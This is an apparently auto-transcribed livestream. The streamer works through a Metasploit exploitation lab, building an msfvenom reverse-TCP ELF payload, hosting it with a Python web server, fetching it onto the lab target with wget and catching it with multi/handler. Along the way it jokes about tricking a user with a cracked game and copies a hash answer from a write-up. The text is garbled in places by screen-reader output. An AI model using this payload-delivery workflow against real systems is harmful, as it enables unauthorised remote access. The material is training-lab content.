Dante. That might be super fun. Once everything is set, we will run the handler and wait for the incoming connections. Fair enough. Yeah, waiting for the reverse shell, and then of course the shell shows up at some point, and then it works. Okay, when the reverse shell is triggered, the connection will be received by multi-handler and provided up with a shell. If the payload was set as Metasploit, for example in Windows executable format, multi-handler would provide us with a Metasploit shell. In this case, that wouldn't happen because we're using a PHP reverse. Based on the target systems, configuration, operating system, install web server, installed interpreter, etc., MSF Venom can be used to create payloads in almost all formats. Below is a few examples you will often use. In all these examples, lhost will be the IP address of your attacking machine, and lport, yeah. Computer.
Linux executable and linkable format, ELF. Venom P Linux to the .elf format is, however, the .elf format is comparable to the .x format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell command to the target machine.
Yeah.
Windows. Venom P window plan.
Yeah, we saw that already. You can make ACK, you can make ASP. Python.
Payloads. This means you will need to have the exploit/multi/handler module listening on your attacking machine. To work as a need, this will be the same. You answer the questions below. Launch the VM attached.
Launch the VM attached to this task. The username is Murphy, and the password is 1Q2W3E4R. You can connect via SSH or launch this machine in the browser. Once on the terminal, type sudo su to get a root shell. This will make things easier. Okay, so we're opening a new shell, I guess. Murphy at, what is it?
Try Acme Metasploit. Exploit out of region. Find. Try main landmark title. Metasploit Venom. Target IP at 10.10.
10.10.230.188. Okay, so we do. Come on. 10. 10. What did I say? 230.188. Okay, 230.188. That's 199. That's 188. There you go. Yes, you may connect. What was the password? 1Q2W3E4R. Okay, let's get a root shell. I guess again, 1Q2W3E4R. There's our shell. Fantastic. Okay, let's go in here. Yeah, Murphy. To get back to where we were. Did that one. Okay. Create a metasploited payload in the /elf format on the attack box, not your attacking machine of choice. Okay. We'll scroll up a little bit because there's literally a command to do that given to us right here. Okay, so we want this entire string here. We go to my attack box, which is this one. We can actually get out of this. We don't need this anymore. Yeah, that thing is gone. There you go. Okay. We'll just exit out of this metasploit. We don't need this anymore. Very good. Let's get out of this context as well. Actually, let's close Metasploit entirely for now. We don't need it for the next bit. We just need MSF Venom. So we're going to paste this in here. No, not that. Not that. That is not the right thing. Just there. In fact, we want this line here. Apparently it didn't copy for some reason, so we got it here. So the IP for lhost needs to be changed. Right now that's wrong. It needs to be 220.183 on the X's. We'll put that. Linux, yeah, reverse TCP, looks good. lhost 1010xx. So let's scroll down. 200.183, is that correct? No, 220.183. 220.183. Hold on to that. Local port also needs to be changed. It's currently XXXX. We'll change it to the often common 1337 right here. So L port's 1337. File type is F. We'll make revshell.elf. There we go. It's making it. In the meantime, let's just say that we did and go to the next assignment. Assuming they're having us set up like a Python server to download that file or something weird like that. Let's see. Create. Yeah, we did. Very nice. What's the next question? Transfer it to the target machine. You can start a Python web server on your attacking machine with the python 3-m http.server 9000 command and use wget. Attacking machine. slash shell.elf. Okay, yeah, so it's pretty simple, pretty good framework for what we're about to do.
Payload size 100, final size of ELF file 207 bytes.
So this is our attack box. We need to essentially imitate a server that you downloaded a wrong thing from. So for that, we need to actually have this be a web server. Python is a good way to do that. Python 3-m for just run code. http.server, I believe it is.
Server serving HTTP on 0.0.0.048,000 http //0.0.0.0:8000.
So it listens on 0.0.0.0, which is all interfaces, which means you won't get any weird things where like the network interface isn't properly connecting. We can now go get that file from this machine. So we go here, we do, what is it? wget 10 220.183 10.220.283 no 183, dang it, 183 slash, what was it, rev shell.elf. Did it work? Error 405, method not allowed. What did I miss? And use wget slash shell. Oh, I know what I did wrong. For one, it's not rev shell, I think it's rev. This is just shell, and I didn't put the port thing. So we need to put, oh, you can't click here, that's right. So we're gonna remove this bit, just shell.elf. We're gonna go before the slash, put a colon and an 8000, and this should work. File not found. Maybe it is rev shell. Yeah. Okay. So right now we have that file. It's in our target machine. We have the virus on the system, as it were. We now need to make sure that on the target machine, I'm just gonna do it, and I'm not gonna, we don't need the server anymore. I'm just gonna do it right now at this point. We'll do the questions after, because I just want to kind of get through this real quick now, and it just, if I have to keep going back and forth, it'll take forever. So we're starting up Metasploit again. We need to use that multi/handler module that it told us about. So we'll do that. I'll just let it control my way through this. Okay, let's go. Use, what is it? Auxiliary/multi/handler.
No results from search. MSF6 greater use auxiliary/muddly/handler.
Oh, muddly. Muddly handler. What's a muddly?
No results from search. Search. Handler matching module. Plan 83 81 36 4x3210 exploit/windows/ftp/.
Oh, it's exploit. Okay, so exploit multi-handler.
Using configured payload generic /shell.
There we are. Okay, so now we need to set the right things. lhost. lhost 10.220.183. Then we set the L port, which is 1337 in this case. So we do set L port 1337. We set this to running, so we want it to listen for incoming connections like this.
Started reverse TCP. Started reverse TCP.
Almost done now. And now the wiser user clicks the new fancy computer game that he got a crack for. You know, the new Baldur's Gate 3 or something, didn't want to pay for it, so he clicks the file, and then for some reason it's not working. Why not? Okay, so that's what it warned us about before. We have to put /chmod plus x rev shell.elf. Why isn't my game working? I want to play Baldur's Gate 3. There it goes.
Segmentation fault.
Oh no, that's not good.
Core dump.
Try it again.
Segmentation fault. Core dump.
Well, that's a problem. We might not be able to finish this now.
Segmentation fault.
Okay, so it's not doing it. Let's go through the questions at this point. Maybe this is meant to happen. Let's see.
No answer needed at download. No answer needed at button complete.
Yeah, we did that.
Use a post-exploitation
Use a
module.
post-exploitation method to dump hashes of other users on the system. Sure.
Alert Your end button hint. What is the other user's password hash?
I don't know.
Answer button. Answer button. No answer need use a post-exploit.
My exploit isn't working.
Star 10.10.230.188. Command shell session 3 closed. Star 10.10.230.188. Command shell session 2 closed.
Oh, that's funny. It is trying. It's trying very hard. It's just not succeeding for some reason.
20.1337. Star
Huh.
10.230.188. Command shell session 1 closed.
I'll try it one more time. Worst case, we'll just have to look this up because I don't really feel like fancy like trying a whole bunch of different things at this point. Oh, look. It's working that time, I think. Command shell session 3 close. Oh. No, it broke again. Okay, so yeah, MSF Venom sometimes doesn't work. You get this weird shit. Let's see if there's anything they say that we can do when this happens. If not, I'll just look up the thing.
No answer needed. Downloaded to the target machine. The Python 3m http.server 9000 command and use jet http/transfer complete button.
Yeah, we did this.
No down the Python 3 transfer button. Correct answer. No answer needed. Edit unavailable button. Transfer Python. No button. Correct. Get a Metasploit session on the target machine. No answer needed. At button. Correct answer.
Yeah, it just won't let me for some reason. It just will not run. And I could make it again and then change it up again and then see. Yeah. You gonna behave? No, it just immediately falls over. That's a shame. This is what you would normally do. Like, this is, if this happens, obviously you start trying a different thing. I guess I could try running this not as root. Let's try that as one more like last thing. Let's try running this as system. Where are we? Yeah, let's do this from somewhere else. Let's copy this to like somewhere else. What do we have? /home Ubuntu. Let's copy it there. cp/rev_shell.elf to ubuntu/rev_shell.elf. We exit out of this shell. We become Ubuntu. We are now Ubuntu. Oh, we're Murphy, actually. Okay, well, where are we? Home Ubuntu. Apparently it's just allowed to go in there. Okay. Let's try it from here. Maybe it's just not expecting a root shell. That might be. No, it's just not gonna work. Okay, well, that happens sometimes. Means we need to go find what the hash is. Fortunately, there's usually a lot of write-ups for these. Let's find the write-up tab.
Try main landmark clickable task 5 exploitation region clickable out of toggle 10 point button. 1 days toggle app main landmark drop down menu button collapsed sub menu. Drop down knowledge base 1 of 2. Ask community 2 of 2.
Actually, let me just find a Medium article or something that does this one.
Google document search.
Metasploit exploitation room try hack. Fucking Google. Fuck off.
Clickable navigation. Navigate search landmark zone combo box collapse tab.
Don't you love how computers just get in your way sometimes?
Zone com list Metasploit exploitation 1 of 10.
Yeah, that's the one.
Metasploit X Google Zoken.
Ugh, fuck's sake. Exploitation. Try hack me. Right up. Yeah, here's a medium. And we'll just go to the right bits. Hashes.
Try number 4. Run post / Linux out of block quote number 5. What is the other user's password hash? Highlighted clickable $6 size 0 out of highlighted separator. Highlighted clickable $6 size 0 NNIXW.
Apparently this string. So normally what you would have done is do a very similar thing to what we did before. So you would have run hash dump or that post exploitation / smart hash dump that we ran for the previous command. And you'd get this answer that we just found. And you fill that in here. What?
Clickable Metasploit Venom frame edit multi-line.
No.
Main landmark clickable task 6 Venom region answer format 98.
Here.
Try Acme Metas.
Okay. And then with a little bit of luck, you get the right answer. So I don't know why that wouldn't work in this particular case. I just guess we'd have to use like a different exploit with MSF Venom. I honestly have to stop soon. That's why I didn't do that. I could have easily done it. I just didn't really have the time. We're already like half an hour longer than I normally do these. And that's pretty much the end of this room. Like the next thing is just a summary that says, hey, I read it. And you press that and there's your congratulations, you did it thing. So yeah, that's the Metasploit exploitation room, with a little bit of a break in the middle because I had to do work stuff. That was fun. Okay, congratulations, and that was fun. Let's see, next. Where does it take us next? More Metasploit. Apparently, we are now in Metasploit exploitation, but we did that one already. That's weird. Oh well. Next week, more hacking stuff. We'll have to see what we do. Hopefully I'll have my Braille display back by then, the good one. Not sure if that's going to be a thing. We'll have to see. But that's all for right now. I'm going to not have my screen go through and look for someone to raid because I'll have to look at my email and my dashboards, and you guys don't need to see that. So we're going to not do that. Goodbye. All right, well, that was fun. I'm going to now make sure that we put thank you. You're welcome. Let's have a look at who we're going to bother. Who shall we bother? Let's see. That's the sound. Headphones. There. All right, let's see. I can speed my speech up to the regular amount of speech. That makes it go a lot faster. Joey and the Funk. What we got? Okay. Those are awesome names, so we're gonna pick one at random. Both Finn with gun and Hax Goblin. Let's do Hax Goblin. Hax Goblin.
Raid initiated. We will be raiding Hax Goblin in 90 seconds.
Appreciate that, bro. Let's go to their channel. Oh, dang it. Did I just miss someone right as I left? I'm gonna go to their channel beforehand.
What is that, video game?
No, Tony, we're getting hacked.
Appreciate the follow.
60 seconds remaining.
Dino Dance. Appreciate the follow there. You like right at the last minute. Oh, well, fuck. That's okay. Can we stop it? It's okay. Hex. Hop. Goblins.
30 seconds remaining.
Can I stop it?
Raid initiated.
No. Okay. Nope, we're going to the wrong place. Excelsior! I don't think it can cancel a raid once you've started it, can you? Hex hop.
10 seconds remaining.
Yeah, I don't think we can stop it. Anyway, guys, I'll see you next time. Have a good day. And goodbye.
Raid 60 seconds remaining.
Oh, just go there manually. Hacks Hobgoblin. Just go there
Raid
yourselves.
initiated. We will
I'll
be
also
raiding
send a
Hackshop
raid
Goblin
their
in
way, but
90 seconds.
it'll be a minute before it gets there. It's okay. Hacks Hobgoblin.
30 seconds remaining.
I'm very curious what's gonna happen at this point. Oh boy, oh boy, oh boy.
Sixty seconds remaining. 10 seconds remaining. Raid forwarded to Hackshop Goblins. Thirty seconds remaining. Ten seconds remaining.
Now what's gonna happen? Let's see. 2, 1.
Raid forwarded to Hackshop Goblin.
I turn off